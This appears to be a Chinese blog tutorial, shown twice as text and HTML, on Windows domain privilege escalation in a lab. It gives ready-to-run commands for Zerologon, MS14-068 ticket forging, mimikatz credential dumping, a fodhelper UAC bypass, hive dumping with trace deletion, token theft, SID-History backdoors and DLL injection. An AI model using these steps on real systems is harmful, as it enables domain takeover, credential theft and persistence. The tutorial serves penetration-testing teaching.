内网渗透-账号提权

博主： yuaneuro
发布时间：2021 年 09 月 14 日
2022 次浏览
1 条评论
7002字数
分类：网络安全

CVE-2020-1472（域内提权）

漏洞环境：
域控：windows server 2012 R2
利用过程：
将域控密码设置为空->读取hash->读取sam文件hash(ntds.dit)->恢复域控密码

1.首先验证是否有漏洞

我们使用这个工具 https://github.com/SecuraBV/CVE-2020-1472

python zerologon_tester.py 域控主机名 域控地址

python zerologon_tester.py dc 172.16.253.1

返回success，说明存在漏洞

2. 重置域账号

我们使用这个工具https://github.com/dirkjanm/CVE-2020-1472
但要先安装要安装impacket(https://github.com/SecureAuthCorp/impacket)
安装方法：python -m pip install .
然后执行 python cve-2020-1472-exploit.py 域控主机名域控地址

注意：这时候密码已经置空

3.读取域控中的hash

我们用impacket中的/impacket/examples/secretsdump.py

# windows
python secretsdump.py DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR -just-dc -no-pass

python secretsdump.py yuaneu.ro/[email protected] -just-dc -no-pass

4.获取shell

获取到HASH之后接下来我们就可以利用wmiexec.py登录，从而获取一个SHELL

python wmiexec.py -hashes <HASH> DOMAIN/DOMAIN_USER@DC_IP_ADDR

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:7ab0ec168b0aabb2f20d4de20e4961d4 yuaneu.ro/[email protected] -codec gbk

至此，我们就成功获取到了域控的shell，做完权限位置后，我们要恢复域控的密码，不然域控会脱域。

5. 导出SAM中原来的hash

首先利用注册表命令将目标机的sam或者system文件导出，然后清除痕迹

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

这样可以获取域控脱域之前本地保存的hash

6. 解析hash

secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL

7. 恢复hash

python reinstall_original_pw.py dc 172.16.253.1 3d6830f709a494680a6c7f6f0ee35386bd2a30cc5fb5c1809c19b0666292ccdc4b634cef585ef4d10c98a03e9829280cfd25bb3d9c09949f94b831772b7d821202d3f9ec7ce6fce1310e924705d424c8d846b0a11354d16888614dab917646472901d37fb581b868a646cd26c29ca5620b3722070e157493192e929b7980e5dee5b2f64eee0c7462e5dbc3467b652f1dc77cbac49a81b89b7636fb51b8fc2d6f1cd67373119d769e58223d8eb309e520dde3fe12f39abfe2f7f10fa424b820ebb230524858439fdf866f020a9f227c9359765b67f6a9dc252ec948a3ec32ecfdb59d61544a336694a9771d67a4989e64

MS14-068(server2012以下系统可用)

ms14-068利用的条件有4个

域用户
域控名
域用户密码
使用mimikatz抓取密码：
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > 1.txt
域用户sid
whoami /user
域ip

利用ms14-068.exe 工具生成伪造的kerberos协议认证证书

MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>

MS14-068.exe -u [email protected] -p qwe123@Q -s S-1-5-21-3398013025-58582661-3905515547-1103 -d 172.16.253.1

然后使用mimikatz将证书写入，从而提升为域管理员

kerberos::purge
kerberos::ptc [email protected]

bypass UAC

自动提升（autoElevate）
原理：具有autoElevate属性为True的应用程序会在启动时自动提升权限，而这些应用程序往往都具备微软的签名，微软认为它是可信的。故此，在该程序启动时，将会以管理员身份启动。

fodhelper.exe是win10中引入的，位置在：C:\Windows\System32\fodhelper.exe，因为它使用微软的证书签名软件并位于一个受信任的位置，最重要的是它autoElevate属性为True，允许自动升级，不需要任何交互来允许进程升级

启动 fodhelper.exe 时，会检查注册表
HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command和HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command\DelegateExecute，如果存在则会执行第一个里面的值。

所以我们可以在注册表中创建此结构：

reg add HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command /d C:\Windows\System32\cmd.exe /f
reg add HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_DWORD /d 00000000 /f
fodhelper.exe
reg delete HKEY_CURRENT_USER\Software\Classes\ms-settings\ /f

DLL劫持
原理：首先生成编译好的DLL，并执行自动高权限的程序取加载DLL

使用cs的uac-token-duplication提权模块也可以bypassuac

CVE-2015-1701(内核特权提升漏洞)

exp：https://github.com/hfiref0x/CVE-2015-1701
直接运行就行了

MS16-032，CVE-2016-0099(逻辑漏洞)

exp：https://github.com/zcgonvh/MS16-032

CVE-2020-0787 (本地提权)

exp：https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION

Token窃取与冒用

使用 DuplicateToken(Ex) 函数创建一个新的访问令牌，该令牌复制自现有令牌。然后可以将该令牌用于 ImpersonateLoggedOnUser 函数，允许调用线程模拟已登录用户的安全上下文，或者使用 SetThreadToken 函数将模拟令牌分配给线程。当目标用户在系统上具有非网络登录会话时，这很有用。

这里我们使用Cobalt Strike做演示：

首先我们以testuser用户上线，使用bypassuac提权至管理员。

窃取token：
打开Process List

我们看到这里有域管理员的账号登录

点击steal或者输入steal_token {pid}就可以窃取凭证了

此时就可以访问域控了

使用 rev2self 可移除当前窃取的令牌

父进程PPID欺骗

通常在检查中，通过对父子进程间关系的检测来判断该进程是否存在异常，使用父进程欺骗可以逃避进程监视防御或提升特权。

首先我们使用cs生成一个木马在受害端执行。

查看进程可看到默认的父进程ppid是464

我们点击右键选择Set as PPID,

或者直接输入ppid {ppid}

然后派生一个会话，选择一个listener，然后我们查看进程

可以看到父进程已经成2556了

或者如果在机器上有更高权限的用户存在，我们也可以将父pid设置成高权限账户的进程：

这样派生出来的会话也是域管理员的权限的会话。

SID-History注入(后门)

原理：windows中的sid是独一无二的，用于标识用户或组帐户。帐户可以在SID-History Active Directory 属性中保存额外的 SID，允许域之间的可互操作帐户迁移。所以我们可以使用管理员权限将管理员等用户的SID插入到SID-History中，以此提升权限。

首先在域控执行mimikatz
privilege::debug，提升权限，
sid::patch，对域控LDAP修改过程中的验证函数进行patch，patch共分为两个步骤，如果仅第一步patch成功的话，那么可以使用sid::add功能，两步都patch成功的话才可以使用sid::modify功能，
sid::add /sam:test /new:administrator，将administrator的SID添加到hack的SID History属性中。

DLL注入

首先使用cs生成一个dll

然后RemoteDLLInjector64使用CreateRemoteThread将DLL注入到进程中

RemoteDLLInjector64.exe {PID} {DLL_path}

然后就可以得到一个system权限的会话

最后修改：2022 年 02 月 20 日

如果觉得我的文章对你有用，请随意赞赏

1 条评论

见字如唔
March 24th, 2022 at 12:13 pm

滴滴，开门，查水表啦

回复

发表评论取消回复

内网渗透-账号提权

yuaneuro • 2021 年 09 月 14 日

<h1>CVE-2020-1472（域内提权）</h1>
<ul>
<li>漏洞环境：<br />
域控：windows server 2012 R2</li>
<li>利用过程：<br />
将域控密码设置为空-&gt;读取hash-&gt;读取sam文件hash(ntds.dit)-&gt;恢复域控密码</li>
</ul>
<h3>1.首先验证是否有漏洞</h3>
<p>我们使用这个工具 <span class="external-link"><a class="no-external-link" href="https://github.com/SecuraBV/CVE-2020-1472" target="_blank"><i data-feather="external-link"></i>https://github.com/SecuraBV/CVE-2020-1472</a></span></p>
<pre><code class="language-shell">python zerologon_tester.py 域控主机名 域控地址</code></pre>
<pre><code class="language-shell">python zerologon_tester.py dc 172.16.253.1</code></pre>
<p><img src="https://yuaneu.ro/usr/uploads/2021/09/636887564.png" alt="" style=""><br />
返回success，说明存在漏洞</p>
<h3>2. 重置域账号</h3>
<p>我们使用这个工具https://github.com/dirkjanm/CVE-2020-1472<br />
但要先安装要安装impacket(<span class="external-link"><a class="no-external-link" href="https://github.com/SecureAuthCorp/impacket" target="_blank"><i data-feather="external-link"></i>https://github.com/SecureAuthCorp/impacket</a></span>)<br />
安装方法：<code>python -m pip install .</code><br />
然后执行 <code>python cve-2020-1472-exploit.py 域控主机名 域控地址</code><br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/1755166994.png" alt="" style=""><br />
注意：这时候密码已经置空</p>
<h3>3.读取域控中的hash</h3>
<p>我们用impacket中的/impacket/examples/<strong>secretsdump.py</strong></p>
<pre><code># windows
python secretsdump.py DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR -just-dc -no-pass

python secretsdump.py yuaneu.ro/dc$@172.16.253.1 -just-dc -no-pass</code></pre>
<p><img src="https://yuaneu.ro/usr/uploads/2021/09/404931264.png" alt="" style=""></p>
<h3>4.获取shell</h3>
<p>获取到HASH之后接下来我们就可以利用wmiexec.py登录，从而获取一个SHELL</p>
<pre><code>python wmiexec.py -hashes &lt;HASH&gt; DOMAIN/DOMAIN_USER@DC_IP_ADDR

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:7ab0ec168b0aabb2f20d4de20e4961d4 yuaneu.ro/administrator@172.16.253.1 -codec gbk</code></pre>
<p><img src="https://yuaneu.ro/usr/uploads/2021/09/1339352792.png" alt="" style=""></p>
<p>至此，我们就成功获取到了域控的shell，做完权限位置后，我们要恢复域控的密码，不然域控会脱域。</p>
<h3>5. 导出SAM中原来的hash</h3>
<p>首先利用注册表命令将目标机的sam或者system文件导出，然后清除痕迹</p>
<pre><code>reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit</code></pre>
<p>这样可以获取域控脱域之前本地保存的hash</p>
<h3>6. 解析hash</h3>
<pre><code>secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL</code></pre>
<p><img src="https://yuaneu.ro/usr/uploads/2021/09/312108012.png" alt="" style=""></p>
<h3>7. 恢复hash</h3>
<pre><code>python reinstall_original_pw.py dc 172.16.253.1 3d6830f709a494680a6c7f6f0ee35386bd2a30cc5fb5c1809c19b0666292ccdc4b634cef585ef4d10c98a03e9829280cfd25bb3d9c09949f94b831772b7d821202d3f9ec7ce6fce1310e924705d424c8d846b0a11354d16888614dab917646472901d37fb581b868a646cd26c29ca5620b3722070e157493192e929b7980e5dee5b2f64eee0c7462e5dbc3467b652f1dc77cbac49a81b89b7636fb51b8fc2d6f1cd67373119d769e58223d8eb309e520dde3fe12f39abfe2f7f10fa424b820ebb230524858439fdf866f020a9f227c9359765b67f6a9dc252ec948a3ec32ecfdb59d61544a336694a9771d67a4989e64</code></pre>
<p><img src="https://yuaneu.ro/usr/uploads/2021/09/3361993578.png" alt="" style="">.</p>
<h1>MS14-068(server2012以下系统可用)</h1>
<p>ms14-068利用的条件有4个</p>
<ol>
<li>域用户</li>
<li>域控名</li>
<li>域用户密码<br />
使用mimikatz抓取密码：<br />
<code>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" &gt; 1.txt</code><br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/2502076702.png" alt="" style=""></li>
<li>域用户sid<br />
<code>whoami /user</code></li>
<li>域ip</li>
</ol>
<ul>
<li>利用ms14-068.exe 工具生成伪造的kerberos协议认证证书</li>
</ul>
<pre><code>MS14-068.exe -u &lt;userName&gt;@&lt;domainName&gt; -p &lt;clearPassword&gt; -s &lt;userSid&gt; -d &lt;domainControlerAddr&gt;</code></pre>
<pre><code>MS14-068.exe -u testuser@yuaneu.ro -p qwe123@Q -s S-1-5-21-3398013025-58582661-3905515547-1103 -d 172.16.253.1</code></pre>
<p><img src="https://yuaneu.ro/usr/uploads/2021/09/4024188837.png" alt="" style=""></p>
<ul>
<li>然后使用mimikatz将证书写入，从而提升为域管理员</li>
</ul>
<pre><code>kerberos::purge
kerberos::ptc TGT_testuser@yuaneu.ro.ccache</code></pre>
<p><img src="https://yuaneu.ro/usr/uploads/2021/09/1367459459.png" alt="" style=""><br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/4186470244.png" alt="" style=""></p>
<h1>bypass UAC</h1>
<ol>
<li>自动提升（autoElevate）<br />
原理：具有autoElevate属性为True的应用程序会在<strong>启动时自动提升权限</strong>，而这些应用程序往往都具备微软的签名，微软认为它是可信的。故此，在该程序启动时，将会以管理员身份启动。</li>
</ol>
<p><img src="https://yuaneu.ro/usr/uploads/2021/09/252763822.png" alt="" style=""><br />
<strong>fodhelper.exe</strong>是win10中引入的，位置在：C:\Windows\System32\fodhelper.exe，因为它使用微软的证书签名软件并位于一个受信任的位置，最重要的是它<strong>autoElevate属性为True，允许自动升级，不需要任何交互来允许进程升级</strong></p>
<p>启动 fodhelper.exe 时，会检查注册表<br />
<code>HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command</code>和<code>HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command\DelegateExecute</code>，如果存在则会执行第一个里面的值。</p>
<p>所以我们可以在注册表中创建此结构：</p>
<pre><code class="language-powershell">reg add HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command /d C:\Windows\System32\cmd.exe /f
reg add HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_DWORD /d 00000000 /f
fodhelper.exe
reg delete HKEY_CURRENT_USER\Software\Classes\ms-settings\ /f</code></pre>
<p><img src="https://yuaneu.ro/usr/uploads/2021/09/2570314536.png" alt="" style=""><img src="https://yuaneu.ro/usr/uploads/2021/09/1017615652.png" alt="" style=""></p>
<ol start="2">
<li>DLL劫持<br />
原理：首先生成编译好的DLL，并执行自动高权限的程序取加载DLL<br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/1154689322.png" alt="" style=""><br />
使用cs的uac-token-duplication提权模块也可以bypassuac<br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/3410577227.png" alt="" style=""></li>
</ol>
<h1>CVE-2015-1701(内核特权提升漏洞)</h1>
<p>exp：<span class="external-link"><a class="no-external-link" href="https://github.com/hfiref0x/CVE-2015-1701" target="_blank"><i data-feather="external-link"></i>https://github.com/hfiref0x/CVE-2015-1701</a></span><br />
直接运行就行了<img src="https://yuaneu.ro/usr/uploads/2021/09/685002080.png" alt="" style=""></p>
<h1>MS16-032，CVE-2016-0099(逻辑漏洞)</h1>
<p>exp：<span class="external-link"><a class="no-external-link" href="https://github.com/zcgonvh/MS16-032" target="_blank"><i data-feather="external-link"></i>https://github.com/zcgonvh/MS16-032</a></span><br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/1191257031.png" alt="" style=""></p>
<h1>CVE-2020-0787 (本地提权)</h1>
<p>exp：<span class="external-link"><a class="no-external-link" href="https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION" target="_blank"><i data-feather="external-link"></i>https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION</a></span><br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/2378352600.png" alt="" style=""></p>
<h1>Token窃取与冒用</h1>
<ul>
<li>使用 <code>DuplicateToken(Ex)</code> 函数创建一个新的访问令牌，该令牌复制自现有令牌。然后可以将该令牌用于 <code>ImpersonateLoggedOnUser</code> 函数，允许调用线程模拟已登录用户的安全上下文，或者使用 <code>SetThreadToken</code> 函数将模拟令牌分配给线程。当目标用户在系统上具有非网络登录会话时，这很有用。</li>
</ul>
<p>这里我们使用Cobalt Strike做演示：</p>
<p>首先我们以testuser用户上线，使用bypassuac提权至管理员。</p>
<ul>
<li>窃取token：<br />
打开Process List<br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/814590458.png" alt="" style=""><br />
我们看到这里有域管理员的账号登录<br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/378414949.png" alt="" style=""><br />
点击steal或者输入<code>steal_token {pid}</code>就可以窃取凭证了</li>
</ul>
<p><img src="https://yuaneu.ro/usr/uploads/2021/09/1072459526.png" alt="" style=""></p>
<p>此时就可以访问域控了<br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/37165398.png" alt="" style=""><br />
使用 <code>rev2self</code> 可移除当前窃取的令牌<br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/1663150089.png" alt="" style=""></p>
<h1>父进程PPID欺骗</h1>
<ul>
<li>通常在检查中，通过对父子进程间关系的检测来判断该进程是否存在异常，使用父进程欺骗可以逃避进程监视防御或提升特权。</li>
</ul>
<p>首先我们使用cs生成一个木马在受害端执行。<br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/1314202724.png" alt="" style=""><br />
查看进程可看到默认的父进程ppid是464<br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/139333158.png" alt="" style=""></p>
<p>我们点击右键选择<code>Set as PPID</code>,<br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/2543121008.png" alt="" style=""><br />
或者直接输入<code>ppid {ppid}</code><br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/3320930278.png" alt="" style=""><br />
然后派生一个会话，选择一个listener，然后我们查看进程<br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/2095101191.png" alt="" style=""><br />
可以看到父进程已经成2556了</p>
<p>或者如果在机器上有更高权限的用户存在，我们也可以将父pid设置成高权限账户的进程：<br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/172663997.png" alt="" style=""><br />
这样派生出来的会话也是域管理员的权限的会话。</p>
<h1>SID-History注入(后门)</h1>
<ul>
<li>原理：windows中的sid是独一无二的，用于标识用户或组帐户。帐户可以在<code>SID-History Active Directory 属性</code>中保存额外的 SID，允许域之间的可互操作帐户迁移。所以我们可以使用管理员权限将管理员等用户的SID插入到SID-History中，以此提升权限。</li>
</ul>
<p>首先在域控执行mimikatz<br />
<code>privilege::debug</code>，提升权限，<br />
<code>sid::patch</code>，对域控LDAP修改过程中的验证函数进行patch，patch共分为两个步骤，如果仅第一步patch成功的话，那么可以使用sid::add功能，两步都patch成功的话才可以使用sid::modify功能，<br />
<code>sid::add /sam:test /new:administrator</code>，将administrator的SID添加到hack的SID History属性中。</p>
<h1>DLL注入</h1>
<p>首先使用cs生成一个dll<br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/4286322264.png" alt="" style=""><br />
然后<code>RemoteDLLInjector64</code>使用CreateRemoteThread将DLL注入到进程中</p>
<pre><code>RemoteDLLInjector64.exe {PID} {DLL_path}</code></pre>
<p><img src="https://yuaneu.ro/usr/uploads/2021/09/346247877.png" alt="" style=""><br />
然后就可以得到一个system权限的会话<br />
<img src="https://yuaneu.ro/usr/uploads/2021/09/3888078601.png" alt="" style=""></p>

内网渗透-账号提权

CVE-2020-1472（域内提权）

1.首先验证是否有漏洞

2. 重置域账号

3.读取域控中的hash

4.获取shell

5. 导出SAM中原来的hash

6. 解析hash

7. 恢复hash

MS14-068(server2012以下系统可用)

bypass UAC

CVE-2015-1701(内核特权提升漏洞)

MS16-032，CVE-2016-0099(逻辑漏洞)

CVE-2020-0787 (本地提权)

Token窃取与冒用

父进程PPID欺骗

SID-History注入(后门)

DLL注入

1 条评论

发表评论取消回复

如何用kali搭建钓鱼wifi(图文超详细)

网站设置复制提示,禁f12,禁止调试

typecho出现评论失败及Database Query Error的几种解决方法

在网站设置反反广告插件(屏蔽adblock等)

用python提取sitemap网址并主动提交

django学习笔记(3)-模型简单介绍

python正则re学习记录(之三)

php学习笔记(2)-基础知识

php学习笔记(1)-php变量

如何用kali搭建钓鱼wifi(图文超详细)

内网渗透-账号提权

CVE-2020-1472（域内提权）

1.首先验证是否有漏洞

2. 重置域账号

3.读取域控中的hash

4.获取shell

5. 导出SAM中原来的hash

6. 解析hash

7. 恢复hash

MS14-068(server2012以下系统可用)

bypass UAC

CVE-2015-1701(内核特权提升漏洞)

MS16-032，CVE-2016-0099(逻辑漏洞)

CVE-2020-0787 (本地提权)

Token窃取与冒用

父进程PPID欺骗

SID-History注入(后门)

DLL注入

1 条评论

发表评论 取消回复

内网渗透-账号提权

发表评论取消回复